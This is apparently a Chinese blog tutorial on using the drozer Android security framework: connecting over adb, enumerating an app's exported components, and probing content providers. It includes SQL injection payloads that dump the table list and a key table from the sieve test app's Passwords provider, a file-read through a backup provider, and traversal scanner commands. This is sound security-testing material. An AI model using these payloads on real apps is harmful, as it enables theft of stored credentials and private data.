Android逆向分析之drozer使用

最新推荐文章于 2022-06-14 21:51:24 发布
最新推荐文章于 2022-06-14 21:51:24 发布
阅读量283 收藏
点赞数 1
文章标签: Android drozer
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42495733/article/details/81663571
版权

设备的连接

在手机上打开drozer并讲监听端口打开

在cmd或者是power shell输入 adb forward tcp:31415 tcp:31415

 adb forward tcp:31415 tcp:31415

在Ubuntu中输入 drozer console connect 并出现如下界面表示连接成功

 drozer console connect
Could not find java. Please ensure that it is installed and on your PATH.

If this error persists, specify the path in the ~/.drozer_config file:

    [executables]
    java = /path/to/java
Selecting 1456623556565 (oppo 15 Plus 7.1.2)

            ..                    ..:.
           ..o..                  .r..
            ..a..  . ....... .  ..nd
              ro..idsnemesisand..pr
              .otectorandroidsneme.
           .,sisandprotectorandroids+.
         ..nemesisandprotectorandroidsn:.
        .emesisandprotectorandroidsnemes..
      ..isandp,..,rotectorandro,..,idsnem.
      .isisandp..rotectorandroid..snemisis.
      ,andprotectorandroidsnemisisandprotec.
     .torandroidsnemesisandprotectorandroid.
     .snemisisandprotectorandroidsnemesisan:
     .dprotectorandroidsnemesisandprotector.

drozer Console (v2.4.4)

连接后的使用

查看软件对应的包名:在Ubuntu中输入 run app.package.list -f 【软件名称】

dz> run app.package.list -f QQ
com.tencent.mobileqq (QQ)
dz>

查看APK的详细信息:run app.package.list -a +包名

查看攻击面:

dz> run app.package.attacksurface com.tencent.mobileqq
Attack Surface:
  13 activities exported
  1 broadcast receivers exported
  1 content providers exported
  3 services exported
dz>

查看具体攻击面:run app.activity.info –a 包名

使用drozer加载acticity:  run app.activity.start --component  +apk包名  + activity

查看contentprovider不需要任何特定的权限就可以交互: run app.provider.info -a +包名

猜测可以使用的目录URL: run scanner.provider.finduris -a +路径

使用projection参数和seleciton参数传递简单的sql注入语句到contentprovider
检测语句:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

列数据库中所有表
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
列表内容
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

猜测目录url并使用app.provider.read模块查看某个文件
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

检查是否有SQL注入
run scanner.provider.injection -a +包名

检查是否存在文件遍历
run scanner.provider.traversal -a +包名
 

Small_Bx
关注
drozer Android平台安全评估框架使用
墨痕诉清风的博客
05-31 270
drozerAndroid平台领先的安全评估框架。drozer 诞生的原因是,我们厌倦了在 Android 应用或设备的安全评估期间必须创建数十个自定义的一次性应用程序来测试漏洞。这个过程既费力又浪费大量时间。人们显然需要一个合适的工具来对 Android 进行动态分析,因此 drozer 诞生了。drozer 允许您充当 Android 应用并与其他应用交互。它可以执行已安装应用可以执行的任何操作,例如利用 Android 的进程间通信 (IPC) 机制并与底层操作系统交互。
[车联网安全自学篇] Android安全之常用逆向工具汇总
橙留香Park的博客
03-14 6306
博主同学不定期更新工具集,敬请期待… …
sieve.apk(drozer测试应用程序)
08-29
【1】 sieve.apk:一密码管理器应用程序,展示一些常见的安卓系统漏洞,用于配合drozer测试实验。 【2】配合使用手册见:http://download.csdn.net/detail/zhoaya188/9055491 sieve-A Password Manager App, showcasing some common Android vulnerabilities drozer是一款针对Android系统的安全测试框架。Drozer可以通过与Dalivik VM,其它应用程序的IPC端点以及底层操作系统的交互,避免正处于开发阶段,或者部署于你的组织的android应用程序和设备暴露出不可接受的安全风险。 drozer提供了很多Android平台下的渗透测试exploit供你使用和分享。对于远程漏洞,drozer能够生产shellcode帮助你部署drozer代理作为一个远程管理工具,最大化对设备的利用。 更快的Android安全评估 drozer可以大大缩减Android安全评估的耗时,通过攻击测试暴露Android APP的漏洞。 基于真机的测试 drozer运行在Android模拟器和真实设备上,它不需要USB调试或其他开发即可使用。 自动化和扩展 drozer有很多扩展模块,你可以找到他们进行测试以发现Android安全问题。
Android渗透工具之Drozer源码分析
Just Do IT的行者之路
09-09 3007
最近时间比较充足,想找点事情来做做。再说Drozer这工具整天在手头用得着,只知其玄乎,又听大B哥说其架构是如何的NB。所以,就趁着这份热尽,体会了Drozer的神乎。确实挺神乎的,本人小菜一枚,求各位大神轻虐,在此放过了;如有想体会Drozer的神乎的朋友,在这抛砖引玉,不求感激,只求不坑了各位,哈哈、、、、 1.    Drozer简介        D
安卓夜神模拟器配合ADBdrozer进行app渗透测试
网络安全领域优质创作者
11-16 1万+
网上目前我是没看到有成熟的相关文档,在自己踩了几个坑之后,将使用文档整理出。 首先下载夜神模拟器,这个不难,百度一下就能下载。 adb下载: 链接:https://pan.baidu.com/s/1SKu24yyShwg16lyIupO5VA 提取码:ih0i(来源于其它博主,我懒得自己上传,时效的话联系我) 安装:不需要安装,解压然后放到目录下就行,任意路径,比如d盘下。 dro...
Drozer的安装与使用 | Android逆向工具
weixin_43525479的博客
06-14 9298
Drozer的安装与使用 Android逆向工具
drozer报错解决
杉木人
07-30 3592
1、安装好drozer的PC端和手机端后 2、CMD下输入 drozer console connect 3、可能出现下列问题  问题一(找不到Java路径): Could not find java. Please ensure that it is installed and on your PATH. If this error persists, specify the p...
android逆向工具与文件分析
crystal_shrimps的博客
09-23 495
文章目录写在前面一、逆向android之工具二、相关文件1.zip解压2.apktool反编译3.adb连接 写在前面 工欲善其事必先利于器,android安全测试主要有两个方向: (1)http/https流量分析 (2)逆向 逆向第一步就是下下工具,看看apk文件,学学android基础知识 系统环境:win10+JDK8+python27 一、逆向android之工具 1.dex2jar d...
drozer资料.zip
05-12
在这个博客中,作者可能详细阐述了drozer使用方法、功能、应用场景以及如何通过drozer进行Android应用的安全测试和漏洞挖掘。 **标签解析:** 1. **drozer** - drozer是一款强大的Android安全评估框架,它允许...
android root测试,[原创]安卓逆向之绕过root检测的四种姿势
weixin_39731107的博客
05-26 6173
环境:本机:192.168.137.1 所需软件python2.7.X,android killer 雷电模拟器Kali虚拟机 ip 192.168.137.129 所需软件 drozer Frida objection安卓模拟器:ip 192.168.137.195 所需软件 insecureBankV2.apk(下文简称bank) drozer-agent,frida-server软件地址:i...
drozer_2.3.4.deb (Debian-Ubuntu Archive)
08-27
drozer_2.3.4.deb (Debian-Ubuntu Archive) drozer是一款针对Android系统的安全测试框架。Drozer可以通过与Dalivik VM,其它应用程序的IPC端点以及底层操作系统的交互,避免正处于开发阶段,或者部署于你的组织的android应用程序和设备暴露出不可接受的安全风险。 drozer提供了很多Android平台下的渗透测试exploit供你使用和分享。对于远程漏洞,drozer能够生产shellcode帮助你部署drozer代理作为一个远程管理工具,最大化对设备的利用。 更快的Android安全评估 drozer可以大大缩减Android安全评估的耗时,通过攻击测试暴露Android APP的漏洞。 基于真机的测试 drozer运行在Android模拟器和真实设备上,它不需要USB调试或其他开发即可使用。 自动化和扩展 drozer有很多扩展模块,你可以找到他们进行测试以发现Android安全问题。
Android安全性测试框架Drozer运行常见问题
weixin_44575660的博客
04-27 619
第一个 Could not find java. Please ensure that it is installed and on your PATH. If this error persists, specify the path in the ~/.drozer_config file: [executables] java = C:\path\to\java 在C\用户\主机名新建一个.drozer_config的文件 内容为 [executables] java=C:\Pr
【信息安全服务】安卓渗透测试工具-Drozer 使用指南
Keylion ,Your Hero
09-03 1307
【前言】 本篇博客将介绍移动端渗透测试工具Drozer的安装以及使用方法,希望对做安服的小伙伴有所帮助。 【环境准备】 Python环境:Python 2.7 下载地址 Java环境 :jdk1.8 下载地址 安卓模拟器(逍遥或者 夜神模拟器)下载自行百度 【工具准备】 Drozer-2.4.4 下载地址 AdbAndroidDebugBridge 下载地址 adb agent (安装到手机或者模拟器) 下载地址 【正文】 0X1 创建连接 使用adb工具建立手机或者安卓模拟器...
几条命令用drozer挖漏洞(0基础)
一个很酷的人
04-29 1683
之前介绍过怎么安装drozerdrozer工具安装),本次主要面对于没有基础的新手,怎么用几条命令挖简单的组件漏洞(大部分为中危),经初次工具的使用练习,比较好挖的漏洞主要有,allowback(数据备份与恢复)、本地拒绝服务、本地sql注入。附个最近挖的部分垃圾洞: 1.磨枪上阵! 第一步:adb连接手机或者模拟器(看你心情爱用哪个用哪个) (1)我的三星s8+需要打开usb调试,然后连...
app常见专项测试点
热门推荐
xiaomaoxiao336368的博客
12-07 3万+
常见的apk专项测试,主要有几类(主要指项目中经常用到的) 1、稳定性 2、安全性 3、兼容性 4、版本升级 5、流量测试 6、实际测试总结(对整个项目团队是如何进行测试以及测试的内容) 一、稳定性测试 稳定性测试是指对应用进行长时间的操作,检测功能是否稳定。一般稳定性测试时间是 N*12小时。项目中稳定测试多采用monkey,进行随机测试。 测试方法: 1、跑monkey adb shell m...
app 模拟器抓包 burpsuite_浅析src的app漏洞挖掘
weixin_39812186的博客
10-29 339
前言之前自学了安卓的漏洞挖掘知识,还在wsrc、bilisrc、asrc等提交了安卓app方面的安全漏洞,一直没有做笔记,现在就来总结一下学过的部分知识。用burpsuite实现app抓包点击Proxy——>Options里的add输入模拟器的ip和端口接着就是配置手机端,首先导出Burpsuite的CA证书。点击import/export CA certificate,选择第...
drozer console connect错误_Received an empty response from Agent
weixin_39304739的博客
07-24 1111
错误如下图 经检查adb devices正常,adb forward tcp:31415 tcp:31415也有 然后,查百度知道,觉得可能是因为,我用的实验室的虚拟机,应该是远程连接的.... 然后就先启动了一下drozer服务器,我双击的drozer.bat,感觉一闪而过,不知道有没有启动,然后我输入drozer server start,感觉终端一直挂在那,已经启动了服务器!然后我...
Drozer安装使用及报错解决办法
muier的专栏
11-19 4232
Drozer安装及使用 一:搭建Java开发环境(自己网上搜) 二:搭建Android开发环境(自己网上搜) 三:下载drozer。http://download.csdn.net/detail/muier/9283103 四:下载drozer后,解压压缩包,傻瓜式安装PC端。 五:使用命令  adb install  你自己的路径\agent.apk   在Android手机
Android逆向分析入门:从反编译到Smali解析
逆向分析Android应用时,我们通常会使用如apktool、JEB等工具。例如,使用apktool进行反编译,可以将APK还原成源代码的近似形式。反编译后,XML文件和AndroidManifest.xml将恢复为文本格式,而smali目录则包含了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值